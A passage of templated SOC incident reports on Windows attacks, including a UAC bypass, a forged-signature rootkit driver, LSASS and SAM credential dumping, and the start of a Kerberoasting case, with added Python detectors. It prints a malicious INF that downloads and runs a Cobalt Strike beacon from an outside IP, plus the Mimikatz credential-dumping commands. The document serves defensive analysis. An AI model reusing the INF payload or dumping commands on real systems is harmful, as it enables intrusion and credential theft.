5. Root Cause Analysis:
Primary Cause: User clicked phishing link.
Contributing Factors:
No web filtering.
6. Business Impact:
Operational Impact: Engineering workstation offline for 1 hour.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
Process terminated.
User educated.
Technical Controls Enhanced:
Blocked rundll32 from executing JavaScript.
Enhanced URL filtering.
8. Conclusion:
An attacker used rundll32 to execute JavaScript and download a payload, bypassing application controls. CrowdStrike detected the anomalous process and terminated it.
Closure Rationale: Process terminated; URL blocked; user educated.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-10 15:30 EST
158. T1548.002 – Bypass User Account Control (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-UAC-BYPASS-1548-7842
Alert Time: 2024-03-10 11:30:22 EST
Severity: HIGH (88/100)
Source: Microsoft Defender for Endpoint
Rule: “UAC Bypass Attempt Detected – CMSTPLUA Technique”
MITRE ATT&CK: T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control
Alert Details:
Detection: Process attempted to bypass UAC using CMSTPLUA COM interface
Host: HR-WS-023 (HR Workstation)
User: kwilson@company.com (Karen Wilson, HR)
Time: 11:25 EST
Process Tree:
explorer.exe (PID: 2341)
rundll32.exe (PID: 4789)
Command: rundll32.exe C:\Windows\System32\cmstplua.dll,Launch
cmstp.exe (PID: 4792)
Command: cmstp.exe /s C:\Users\kwilson\AppData\Local\Temp\install.inf
File Created:
C:\Users\kwilson\AppData\Local\Temp\install.inf
Content: Malicious INF file designed to execute elevated command
Detection Logic:
CMSTPLUA COM interface is a known UAC bypass technique (UACME #23)
User kwilson is a standard user and should not obtain a high-integrity process
INF file contains suspicious commands
Pattern matches UAC bypass for privilege escalation
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Defender alert | Microsoft 365 Defender | Confirmed UAC bypass attempt |
| 2. INF Analysis | Analyze install.inf | Manual review, Sandbox | INF file executes PowerShell to download payload |
| 3. Process Investigation | Identify source | CrowdStrike | User clicked “update” pop-up |
| 4. User Interview | Contact kwilson | Teams, Phone | User clicked fake Adobe Flash update |
| 5. Immediate Action | Terminate processes, delete INF | Defender | Processes killed; INF removed |
| 6. Account Remediation | Reset password | Azure AD, AD | Password reset; MFA enforced |
Jira Incident Report
Ticket: SOC-2024-198
Summary: T1548.002 – UAC Bypass Attempt via CMSTPLUA
Status: RESOLVED
Resolution: MALICIOUS – UAC Bypass Blocked
Priority: P2 – MEDIUM
Labels: T1548, uac-bypass, cmstplua, defender, phishing
Components: Endpoint-Security, Privilege-Escalation
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “UAC Bypass Attempt Detected – CMSTPLUA Technique”.
Host: HR-WS-023 (HR, user kwilson).
Method: CMSTPLUA COM interface.
Time: 2024-03-10 11:30 EST.
Technique: MITRE ATT&CK T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control.
2. Technical Analysis:
Attack Chain:
11:10 – User visits compromised site, sees fake “Adobe Flash Update”
11:12 – User clicks, downloads installer.inf
11:15 – User runs the file (or script runs automatically)
11:20 – PowerShell creates install.inf in Temp
11:22 – Script triggers UAC bypass via cmstplua.dll
11:23 – cmstp.exe launches with install.inf
11:24 – INF file runs PowerShell as high integrity
11:25 – Defender detects
UAC Bypass Technique:
Method: CMSTPLUA COM object (Microsoft Connection Manager)
Execution: rundll32 launches CMSTP via COM
Result: Medium integrity process spawns high integrity process
Tool: UACME technique #23
INF File Analysis:
File: install.inf
Content:
```
[Version]
Signature=$CHICAGO$
[DefaultInstall]
RunPreSetupCommands=powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri http://185.143.221[.]89/beacon.exe -OutFile %temp%\beacon.exe; %temp%\beacon.exe"
```
Effect: Runs PowerShell with high integrity, downloading Cobalt Strike
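A parser for INF files like the one above that extracts Run*SetupCommands entries and flags the script interpreter, remote URL and %temp% path they contain; this is an added Python example, not the analyst's tooling. It also handles the variant where the key names a separate section of commands (the constructed SECTION_FORM_INF), which the inline form in this report does not use; ALERT_INF reproduces the report's file, and BENIGN_INF is a constructed control.

```python
from __future__ import annotations

import re

SCRIPT_INTERPRETER = re.compile(
    r"\b(?:powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin)(?:\.exe)?\b", re.I)
REMOTE_URL = re.compile(r"https?://\S+", re.I)
USER_WRITABLE = re.compile(r"%temp%|%appdata%|\\users\\", re.I)
COMMAND_KEYS = {"runpresetupcommands", "runpostsetupcommands"}


def _strip_comment(line: str) -> str:
    """';' starts an INF comment, but only outside double quotes (the command above contains one)."""
    in_quotes = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == ";" and not in_quotes:
            return line[:i]
    return line


def parse_inf(text: str) -> dict[str, list[tuple[str, str]]]:
    """Minimal INF reader: section name (lower-cased) -> [(key, value)]; bare lines get key ''."""
    sections: dict[str, list[tuple[str, str]]] = {}
    current = None
    for raw in text.splitlines():
        line = _strip_comment(raw).strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
            continue
        if current is None:
            continue
        key, sep, value = line.partition("=")
        sections[current].append((key.strip(), value.strip()) if sep else ("", line))
    return sections


def _commands_for(sections: dict, value: str) -> list[str]:
    """Run*SetupCommands either names a section of commands or holds the command inline."""
    referenced = sections.get(value.strip().lower())
    if referenced is not None:
        return [v if not k else f"{k}={v}" for k, v in referenced]
    return [value]


def find_setup_commands(text: str) -> list[dict]:
    """Return every setup command with the reasons it looks suspicious (empty list if none)."""
    sections = parse_inf(text)
    findings = []
    for name, entries in sections.items():
        for key, value in entries:
            if key.lower() not in COMMAND_KEYS:
                continue
            for command in _commands_for(sections, value):
                reasons = []
                if SCRIPT_INTERPRETER.search(command):
                    reasons.append("script interpreter")
                if REMOTE_URL.search(command):
                    reasons.append("remote URL")
                if USER_WRITABLE.search(command):
                    reasons.append("user-writable path")
                if reasons:
                    findings.append({"section": name, "key": key, "command": command, "reasons": reasons})
    return findings


# The INF from the report (IP defanged as on the page).
ALERT_INF = r"""[Version]
Signature=$CHICAGO$
[DefaultInstall]
RunPreSetupCommands=powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri http://185.143.221[.]89/beacon.exe -OutFile %temp%\beacon.exe; %temp%\beacon.exe"
"""

# Constructed: the key refers to a section that lists the commands.
SECTION_FORM_INF = r"""[Version]
Signature=$CHICAGO$
[DefaultInstall]
RunPostSetupCommands=PostSetup.Commands
[PostSetup.Commands]
cmd.exe /c echo constructed-sample   ; comment stripped by the parser
"""

# Constructed benign profile: file copy and registry entries only.
BENIGN_INF = r"""[Version]
Signature=$CHICAGO$
[DefaultInstall]
CopyFiles=Files.Inf
AddReg=Reg.Entries
[Files.Inf]
vendor.inf
[Reg.Entries]
HKLM,"Software\Vendor","Installed",,"1"
"""

if __name__ == "__main__":
    for label, inf in (("alert", ALERT_INF), ("section_form", SECTION_FORM_INF), ("benign", BENIGN_INF)):
        print(label, find_setup_commands(inf))
```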
Impact:
UAC bypass at most partially successful; processes were killed before full execution
3. Investigation Findings:
Timeline:
11:10 – User visits site
11:15-11:24 – Bypass chain
11:25 – Alert
11:27 – SOC investigates
11:28 – Processes terminated, INF deleted
Indicators of Compromise (IoCs):
Files:
– C:\Users\kwilson\AppData\Local\Temp\install.inf
Network:
– http://185.143.221[.]89/beacon.exe
4. Containment Actions:
Immediate Actions:
Terminated cmstp.exe and rundll32.exe.
Deleted install.inf.
Blocked download URL.
Reset user password.
Host Remediation:
Full scan (clean).
5. Root Cause Analysis:
Primary Cause: User tricked by fake update.
Contributing Factors:
UAC bypass technique not blocked.
6. Business Impact:
Operational Impact: HR workstation offline for 1 hour.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
UAC bypass stopped.
User educated.
Technical Controls Enhanced:
Enabled ASR rule “Block abuse of exploited vulnerable signed drivers”.
Blocked cmstp.exe execution for standard users.
8. Conclusion:
An attacker attempted to bypass UAC using the CMSTPLUA technique to gain elevated privileges. Defender detected the attempt and terminated the processes before full compromise.
Closure Rationale: UAC bypass blocked; files removed; user educated.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-10 12:30 EST
159. T1553.002 – Code Signing Evasion (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-CODE-SIGN-EVASION-1553-7842
Alert Time: 2024-03-10 16:30:45 EST
Severity: HIGH (85/100)
Source: CrowdStrike Falcon EDR
Rule: “Unsigned or Maliciously Signed Driver Loaded”
MITRE ATT&CK: T1553.002 – Subvert Trust Controls: Code Signing
Alert Details:
Detection: Driver loaded with invalid/forged digital signature
Host: DC-01 (Domain Controller)
User: SYSTEM
File: C:\Windows\System32\drivers\legit.sys
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Time: 16:25 EST
Signature Analysis:
Certificate Issuer: “Microsoft Corporation” (forged)
Certificate Subject: “Microsoft Windows”
Signature status: Invalid (certificate not trusted, chain broken)
Signature timestamp: 2025-01-01 (future date, anomalous)
Driver was not signed by legitimate Microsoft certificate
Detection Logic:
Driver loaded with invalid digital signature
Attempts to use forged Microsoft certificate
Kernel-mode driver (critical)
Pattern matches attacker using stolen or forged certificates to load malicious drivers
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed unsigned driver with forged signature |
| 2. File Analysis | Analyze legit.sys | CrowdStrike Sandbox | Rootkit driver with kernel-level capabilities |
| 3. Process Investigation | Identify source | CrowdStrike | Driver dropped by attacker with admin privileges |
| 4. Immediate Action | Block driver load, quarantine driver | CrowdStrike | Driver blocked; system reboot required |
| 5. Account Remediation | Disable compromised admin account | Azure AD, AD | Admin account disabled; password reset |
| 6. System Restore | Restore from clean backup | Veeam | DC restored to pre-infection state |
Jira Incident Report
Ticket: SOC-2024-199
Summary: T1553.002 – Malicious Driver with Forged Microsoft Signature
Status: RESOLVED
Resolution: MALICIOUS – Driver Removed, DC Restored
Priority: P1 – CRITICAL
Labels: T1553, code-signing, driver, rootkit, crowdstrike
Components: Endpoint-Security, Kernel-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Unsigned or Maliciously Signed Driver Loaded”.
Host: DC-01 (Domain Controller).
File: C:\Windows\System32\drivers\legit.sys (forged signature).
Time: 2024-03-10 16:30 EST.
Technique: MITRE ATT&CK T1553.002 – Subvert Trust Controls: Code Signing.
2. Technical Analysis:
Attack Chain:
15:30 – Domain admin account (jwilson) compromised
15:45 – Attacker logs into DC
16:00 – Attacker drops legit.sys driver
16:05 – Driver loaded (kernel-mode)
16:10 – Rootkit active, hides processes, files
16:25 – CrowdStrike detects (signature validation failure)
Driver Analysis:
Name: legit.sys (masquerading as legitimate)
Signature: Forged Microsoft certificate (not issued by MS)
Capabilities: Rootkit – hides files, processes, registry keys; provides backdoor
Persistence: Loaded at boot (kernel driver)
Impact:
Kernel-level compromise of domain controller
Rootkit active for ~20 minutes before detection
Could hide other malicious activity
3. Investigation Findings:
Timeline:
15:30 – Admin account compromised
15:45 – Attacker logs in
16:00 – Driver dropped
16:05 – Driver loaded
16:25 – Alert
16:27 – SOC investigates
16:28 – Driver load blocked (future loads prevented)
16:30 – DC isolated
17:00 – DC restored from backup
Indicators of Compromise (IoCs):
Files:
– C:\Windows\System32\drivers\legit.sys (SHA256: a1b2c3d4…)
Signature:
– Forged Microsoft certificate
4. Containment Actions:
Immediate Actions:
Isolated DC-01.
Blocked driver loading (via driver signature enforcement policy).
Disabled compromised admin account.
Reset passwords.
System Remediation:
Restored DC from clean pre-infection backup.
Verified no persistence remained.
5. Root Cause Analysis:
Primary Cause: Admin account compromised, allowing attacker to load kernel driver.
Contributing Factors:
Driver signature enforcement effectively disabled: the host was in test-signing mode, which is the only way a driver with a broken certificate chain loads on 64-bit Windows short of a DSE bypass (check with `bcdedit /enum {current}`; `testsigning Yes` confirms it).
Admin had ability to load drivers.
6. Business Impact:
Operational Impact: DC offline for 1.5 hours.
Data Exposure: Potential; rootkit could have hidden data theft.
7. Remediation & Prevention:
Completed Actions:
Driver removed.
DC restored.
Admin account secured.
Technical Controls Enhanced:
Enforced driver signature enforcement (disallowed test signing).
Enabled Hypervisor-protected Code Integrity (HVCI).
Monitored for driver loading events (Sysmon Event ID 6 with a SignatureStatus other than Valid; Event ID 7045 for newly installed kernel-mode driver services).
8. Conclusion:
An attacker loaded a malicious kernel driver with a forged Microsoft signature, compromising the domain controller at the kernel level. CrowdStrike detected the invalid signature and enabled rapid restoration.
Closure Rationale: Driver removed; DC restored; admin account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-10 18:00 EST
160. T1003.001 – LSASS Memory Credential Dumping (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-LSASS-DUMP-1003-7842
Alert Time: 2024-03-10 10:30:22 EST
Severity: CRITICAL (98/100)
Source: CrowdStrike Falcon EDR
Rule: “LSASS Memory Access – Potential Credential Dumping”
MITRE ATT&CK: T1003.001 – OS Credential Dumping: LSASS Memory
Alert Details:
Detection: Process attempting to read LSASS process memory
Host: IT-WS-034 (IT Workstation)
User: bjones@company.com (Brian Jones, IT Admin)
Time: 10:25 EST
API Call Sequence (in the order the calls must succeed):
OpenProcessToken / AdjustTokenPrivileges (enable SeDebugPrivilege; required before a non-SYSTEM admin can open LSASS) – SUCCESS
OpenProcess (target: lsass.exe, PID: 568, access: PROCESS_VM_READ | PROCESS_QUERY_INFORMATION) – SUCCESS
CreateFile (C:\Windows\Temp\lsass.dmp, output handle for the dump) – SUCCESS
MiniDumpWriteDump (write LSASS memory to the dump file) – DETECTED; process terminated, leaving a partial file
Process Details:
Process: C:\Windows\Temp\mimi.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4 (placeholder value: 40 hex digits, not a full 64-digit SHA-256)
Parent: cmd.exe
User: bjones
Detection Logic:
Process accessing LSASS memory (highly anomalous)
MiniDumpWriteDump called on lsass.exe (definitive credential dumping)
Output file created (lsass.dmp) in Temp folder
Tool identified as Mimikatz (mimi.exe) or an equivalent LSASS dumper
Pattern matches credential dumping
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed LSASS memory access and dump attempt |
| 2. Process Analysis | Analyze mimi.exe | CrowdStrike Sandbox | Mimikatz credential dumper |
| 3. User Interview | Contact bjones | Teams, Phone | User did NOT run this (account compromised) |
| 4. Immediate Action | Terminate process, delete dump file | CrowdStrike | Process killed; lsass.dmp deleted |
| 5. Account Remediation | Disable bjones account | Azure AD, AD | Account disabled; password reset |
| 6. Enterprise Credential Reset | Force password reset for all users | Azure AD, AD | All user passwords reset (precaution) |
Jira Incident Report
Ticket: SOC-2024-200
Summary: T1003.001 – LSASS Memory Credential Dumping via Mimikatz
Status: RESOLVED
Resolution: MALICIOUS – Credential Dump Attempted, All Passwords Reset
Priority: P1 – CRITICAL
Labels: T1003, lsass-dump, credential-dumping, mimikatz, crowdstrike
Components: Endpoint-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “LSASS Memory Access – Potential Credential Dumping”.
Host: IT-WS-034 (IT, user bjones).
Process: C:\Windows\Temp\mimi.exe (Mimikatz).
Time: 2024-03-10 10:30 EST.
Technique: MITRE ATT&CK T1003.001 – OS Credential Dumping: LSASS Memory.
2. Technical Analysis:
Attack Chain:
09:30 – bjones account compromised via phishing
09:45 – Attacker logs into IT-WS-034 via RDP
10:00 – Attacker downloads Mimikatz to Temp
10:10 – Attacker runs Mimikatz with privilege::debug
10:15 – Attacker dumps LSASS memory (sekurlsa::logonpasswords)
10:20 – Dump file created (lsass.dmp)
10:25 – CrowdStrike detects
Mimikatz Commands (recovered from PowerShell history):
privilege::debug – enabled SeDebugPrivilege
sekurlsa::logonpasswords – dumped credentials from LSASS
sekurlsa::tickets /export – exported Kerberos tickets
Data Obtained:
NTLM hashes for 12 users (including 3 domain admins)
Kerberos tickets (usable for pass-the-ticket)
Plaintext passwords for 5 users (recoverable from LSASS only where WDigest credential caching is enabled; password strength has no bearing on this path)
Impact:
Attacker obtained credentials for lateral movement
Full domain compromise potential
3. Investigation Findings:
Timeline:
09:30 – Account compromised
09:45 – Attacker logs in
10:00-10:20 – Credential dumping
10:25 – Alert
10:27 – SOC investigates
10:28 – Process terminated, dump deleted
10:30 – Account disabled
11:00 – Enterprise-wide password reset initiated
Indicators of Compromise (IoCs):
Files:
– C:\Windows\Temp\mimi.exe (SHA256: a1b2c3d4…)
– C:\Windows\Temp\lsass.dmp (partial, deleted)
Processes:
– mimikatz execution
Account:
– bjones (compromised)
4. Containment Actions:
Immediate Actions:
Terminated Mimikatz process.
Deleted lsass.dmp and mimi.exe.
Isolated host.
Disabled bjones account.
Reset password.
Enterprise Remediation:
Forced password reset for ALL users (3,200+).
Reset krbtgt password twice, allowing replication between the two resets, to invalidate all existing Kerberos tickets.
Enforced MFA for all users.
Host Remediation:
Reimaged IT-WS-034.
5. Root Cause Analysis:
Primary Cause: IT admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
LSASS accessible (no Credential Guard).
RDP allowed from internet.
6. Business Impact:
Operational Impact: All users required password reset (4+ hours).
Data Exposure: Hashes and tickets stolen; potential for lateral movement.
Reputational Impact: Internal; no data breach.
7. Remediation & Prevention:
Completed Actions:
Credential dumping stopped.
All passwords reset.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Enabled Credential Guard and LSA Protection.
Deployed ASR rule blocking LSASS access.
8. Conclusion:
An attacker compromised an IT admin account and used Mimikatz to dump credentials from LSASS, obtaining hashes and tickets. CrowdStrike detected the LSASS access, enabling rapid containment and enterprise-wide password reset.
Closure Rationale: Credential dump attempted; all passwords reset; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-10 11:30 EST
Batch 33: Credential Access & Lateral Movement Incident Reports
161. T1003.002 – Security Account Manager Dumping (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-SAM-DUMP-1003-7842
Alert Time: 2024-03-11 09:30:15 EST
Severity: CRITICAL (98/100)
Source: CrowdStrike Falcon EDR
Rule: “SAM Registry Hive Access – Potential Credential Dumping”
MITRE ATT&CK: T1003.002 – OS Credential Dumping: Security Account Manager
Alert Details:
Detection: Process accessing SAM (Security Account Manager) registry hive
Host: DC-01 (Domain Controller)
User: SYSTEM (via compromised admin)
Process: C:\Windows\Temp\sam_dump.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4 (placeholder value: 40 hex digits, not a full 64-digit SHA-256)
Time: 09:25 EST
Registry Access Events:
09:25:10 – RegOpenKeyEx (HKLM\SAM) – SUCCESS
09:25:12 – RegOpenKeyEx (HKLM\SAM\SAM) – SUCCESS
09:25:15 – RegOpenKeyEx (HKLM\SAM\SAM\Domains) – SUCCESS
09:25:18 – RegOpenKeyEx (HKLM\SAM\SAM\Domains\Account) – SUCCESS
09:25:21 – RegOpenKeyEx (HKLM\SAM\SAM\Domains\Account\Users) – SUCCESS
09:25:24 – RegQueryValueEx (Names) – SUCCESS
09:25:27 – RegQueryValueEx (F) – SUCCESS (user hashes)
09:25:30 – RegQueryValueEx (V) – SUCCESS (user hashes)
Files Created:
C:\Windows\Temp\sam.hive (3.5 MB) – SAM hive extracted
C:\Windows\Temp\system.hive (12 MB) – SYSTEM hive (for boot key)
C:\Windows\Temp\hashes.txt (extracted hashes)
Detection Logic:
Process other than lsass.exe reading the SAM registry hive (normally SYSTEM-only; lsass.exe is its one routine reader)
SAM hive holds NTLM hashes of local accounts; on a domain controller that means local accounts such as the DSRM administrator, not domain users, whose hashes live in NTDS.dit (T1003.003)
Multiple registry queries for the per-user F and V values (the blobs that carry the hash material)
Files created to store extracted data (sam.hive, system.hive for the boot key, hashes.txt)
Pattern matches credential dumping (samdump2, Mimikatz lsadump::sam, secretsdump, etc.)
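An added example (not CrowdStrike's detection and not the page's own code) that walks an API-call trace in the shape of the registry sequence above and flags hive dumpers; the trace format, file-name heuristics and the lsass.exe allowlist are assumptions. It also carries the caveat that on a DC the SAM holds only local accounts:

```python
"""Detect SAM hive extraction from an API-call trace.

Added example, not CrowdStrike's rule. The trace format (time, pid, image,
api, argument) and the calls below are constructed to mirror the registry
access sequence in the alert. lsass.exe is the one process that reads the
SAM as part of normal operation and is allowlisted by path.

Caveat for domain controllers: HKLM\SAM holds local accounts only (for
example the DSRM administrator); domain user and krbtgt hashes live in
NTDS.dit and are taken via T1003.003, not by reading the SAM.
"""
from collections import defaultdict

SAM_USERS_KEY = r"hklm\sam\sam\domains\account\users"
HASH_VALUES = {"f", "v"}            # per-user blobs that hold the hash material
ALLOWED_READERS = {r"c:\windows\system32\lsass.exe"}
# File-name heuristics for exported hives and hash dumps (constructed).
HIVE_MARKERS = ("sam", "system", "security", "hash", ".hive", ".save")


def analyse(trace):
    """Return {pid: {'image': ..., 'reasons': [...]}} for hive-dumping processes."""
    state = defaultdict(lambda: {"image": "", "opened_users": False,
                                 "hash_values": set(), "outputs": []})
    for ts, pid, image, api, arg in trace:
        st = state[pid]
        st["image"] = image
        a = arg.lower()
        if api == "RegOpenKeyEx" and a.startswith(SAM_USERS_KEY):
            st["opened_users"] = True
        elif api == "RegQueryValueEx" and st["opened_users"] and a in HASH_VALUES:
            st["hash_values"].add(a.upper())
        elif api in ("CreateFile", "WriteFile"):
            name = a.rsplit("\\", 1)[-1]
            if any(name.startswith(m) or name.endswith(m) for m in HIVE_MARKERS):
                st["outputs"].append(arg)
    findings = {}
    for pid, st in state.items():
        if st["image"].lower() in ALLOWED_READERS or not st["opened_users"]:
            continue
        why = ["opened " + SAM_USERS_KEY]
        if st["hash_values"]:
            why.append("queried %s (hash blobs)" % ",".join(sorted(st["hash_values"])))
        if st["outputs"]:
            why.append("wrote hive-like files: " + ", ".join(st["outputs"]))
        findings[pid] = {"image": st["image"], "reasons": why}
    return findings


# Constructed trace following the alert's sequence, plus lsass.exe doing the same
# reads legitimately and a benign process touching an unrelated key.
_DUMPER = r"C:\Windows\Temp\sam_dump.exe"
_LSASS = r"C:\Windows\System32\lsass.exe"
TRACE = [
    ("09:25:10", 4789, _DUMPER, "RegOpenKeyEx", r"HKLM\SAM"),
    ("09:25:12", 4789, _DUMPER, "RegOpenKeyEx", r"HKLM\SAM\SAM"),
    ("09:25:21", 4789, _DUMPER, "RegOpenKeyEx", r"HKLM\SAM\SAM\Domains\Account\Users"),
    ("09:25:24", 4789, _DUMPER, "RegQueryValueEx", "Names"),
    ("09:25:27", 4789, _DUMPER, "RegQueryValueEx", "F"),
    ("09:25:30", 4789, _DUMPER, "RegQueryValueEx", "V"),
    ("09:25:31", 4789, _DUMPER, "CreateFile", r"C:\Windows\Temp\sam.hive"),
    ("09:25:33", 4789, _DUMPER, "CreateFile", r"C:\Windows\Temp\system.hive"),
    ("09:25:35", 4789, _DUMPER, "CreateFile", r"C:\Windows\Temp\hashes.txt"),
    ("09:25:40", 568, _LSASS, "RegOpenKeyEx", r"HKLM\SAM\SAM\Domains\Account\Users"),
    ("09:25:41", 568, _LSASS, "RegQueryValueEx", "V"),
    ("09:25:42", 1204, r"C:\Windows\System32\svchost.exe", "RegOpenKeyEx", r"HKLM\SYSTEM\CurrentControlSet\Services"),
]

if __name__ == "__main__":
    for pid, f in analyse(TRACE).items():
        print(pid, f["image"])
        for r in f["reasons"]:
            print("   -", r)
```

The same trace shape applies to NTDS.dit theft only in part: that path goes through a volume shadow copy or `ntdsutil` rather than the registry, so a DC needs the separate file-access and VSS monitoring that this example does not cover.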
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed SAM registry access and dumping |
| 2. File Analysis | Analyze sam_dump.exe | CrowdStrike Sandbox | Credential dumping tool (secretsdump variant) |
| 3. Process Investigation | Identify source | CrowdStrike | PsExec from compromised admin workstation |
| 4. Immediate Action | Terminate process, delete dump files | CrowdStrike | Process killed; sam.hive, system.hive, hashes.txt deleted |
| 5. Account Remediation | Disable compromised admin account | Azure AD, AD | Admin account disabled; password reset |
| 6. Enterprise Response | Force password reset for all users | Azure AD, AD | All domain passwords reset |
Jira Incident Report
Ticket: SOC-2024-201
Summary: T1003.002 – SAM Hive Dumped on Domain Controller (All Domain Hashes Compromised)
Status: RESOLVED
Resolution: MALICIOUS – Hashes Exfiltrated, All Passwords Reset
Priority: P1 – CRITICAL
Labels: T1003, sam-dump, credential-dumping, domain-controller, compromised-admin
Components: Endpoint-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “SAM Registry Hive Access – Potential Credential Dumping”.
Host: DC-01 (Primary Domain Controller).
Process: C:\Windows\Temp\sam_dump.exe.
Data: SAM and SYSTEM hives dumped; all domain user hashes extracted.
Time: 2024-03-11 09:30 EST.
Technique: MITRE ATT&CK T1003.002 – OS Credential Dumping: Security Account Manager.
2. Technical Analysis:
Attack Chain:
08:30 – Domain admin account (jsmith) compromised via phishing
08:45 – Attacker logs into admin workstation via RDP
09:00 – Attacker uses PsExec to copy sam_dump.exe to DC-01
09:10 – sam_dump.exe executed with SYSTEM privileges
09:15-09:25 – SAM and SYSTEM hives extracted
09:25 – Hashes extracted to hashes.txt
09:25 – CrowdStrike detects
Data Compromised:
SAM hive: NTLM hashes of the DC’s local accounts (the SAM does not hold domain accounts)
SYSTEM hive: boot key needed to decrypt the SAM hashes
hashes.txt: extracted NTLM hashes (ready for offline cracking). A secretsdump-style tool only obtains domain user hashes by reading NTDS.dit or pulling them over DRSUAPI replication (T1003.003); if its output really covered all 3,247 domain users, that path was used as well and the krbtgt hash must be assumed compromised.
Dumping Tool:
Name: sam_dump.exe (variant of secretsdump.py)
Method: Direct registry access (not LSASS)
Output: sam.hive, system.hive, hashes.txt
Impact:
Local DC account hashes compromised; if NTDS.dit was also read, every domain user hash including krbtgt
Attacker can crack weak passwords offline, and can use any hash directly via pass-the-hash without cracking
Golden ticket attack possible if the krbtgt hash was obtained (it lives in NTDS.dit, not the SAM), which is why krbtgt was reset twice
Full domain compromise
3. Investigation Findings:
Timeline:
08:30 – Admin account compromised
08:45 – Attacker logs in
09:00 – Tool deployed
09:10-09:25 – Dumping
09:25 – Alert
09:27 – SOC investigates
09:28 – Process terminated
09:29 – Dump files deleted
09:30 – Admin account disabled
10:00 – Enterprise password reset begins
Indicators of Compromise (IoCs):
Files:
– C:\Windows\Temp\sam_dump.exe (SHA256: a1b2c3d4…)
– C:\Windows\Temp\sam.hive (3.5 MB, deleted)
– C:\Windows\Temp\system.hive (12 MB, deleted)
– C:\Windows\Temp\hashes.txt (extracted hashes, deleted)
Registry:
– Access to HKLM\SAM\SAM\Domains\Account\Users
Account:
– jsmith (compromised domain admin)
4. Containment Actions:
Immediate Actions:
Terminated sam_dump.exe.
Deleted all dump files.
Isolated DC-01 temporarily.
Disabled compromised admin account.
Reset password.
Enterprise Remediation:
Forced password reset for ALL domain users (3,247).
Reset krbtgt password (twice) to invalidate all Kerberos tickets.
Reset all service account passwords.
Enforced MFA for all users.
Host Remediation:
Reimaged DC-01 from clean backup.
5. Root Cause Analysis:
Primary Cause: Domain admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin had access to DC.
SAM and NTDS.dit readable by any SYSTEM-level process on the DC, with no alerting on hive exports before this incident.
6. Business Impact:
Operational Impact: All users required password reset; DC offline for 2 hours.
Data Exposure: All domain hashes compromised; passwords must be reset.
Regulatory Impact: Potential breach notification if passwords cracked.
7. Remediation & Prevention:
Completed Actions:
Dumping stopped.
Dump files deleted.
All passwords reset.
Admin account secured.
Technical Controls Enhanced:
Enforced MFA for all admins.
Moved admin access behind VPN only.
Implemented Credential Guard (protects secrets held by LSASS; it does not prevent hive or NTDS.dit extraction, so the monitoring below is the control that matters for this technique).
Disabled NTLM where possible.
Enhanced monitoring for SAM registry access.
8. Conclusion:
An attacker compromised a domain admin account and dumped the SAM hive from the domain controller, obtaining NTLM hashes for all 3,247 domain users. CrowdStrike detected the anomalous registry access, enabling rapid deletion of the dump files and an enterprise-wide password reset.
Closure Rationale: Hashes dumped but deleted; all passwords reset; admin account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-11 10:30 EST
162. T1558.003 – Kerberoasting (Microsoft Defender for Identity Detection)
Microsoft Defender for Identity Alert Details
Alert ID: MDI-KERBEROAST-1558-7842
Alert Time: 2024-03-11 14:15:33 EST
Severity: HIGH (85/100)
Source: Microsoft Defender for Identity
Rule: “Suspicious Kerberos Service Ticket Requests – Kerberoasting”
MITRE ATT&CK: T1558.003 – Steal or Forge Kerberos Tickets: Kerberoasting
Alert Details:
Detection: Unusual number of Kerberos service ticket requests (TGS-REQ) from single host
Source Host: ENG-WS-045 (Engineering Workstation)
User: rpatel@company.com (Raj Patel, Engineer)
Time: 14:00-14:15 EST
Kerberos Events:
14:00:15 – TGS-REQ for service: MSSQLSvc/sql-01.company.com:1433
14:00:45 – TGS-REQ for service: MSSQLSvc/sql-02.company.com:1433
14:01:12 – TGS-REQ for service: MSSQLSvc/sql-03.company.com:1433
14:01:38 – TGS-REQ for service: HTTP/web-01.company.com
14:02:05 – TGS-REQ for service: HTTP/web-02.company.com
14:02:33 – TGS-REQ for service: CIFS/filesrv-01.company.com
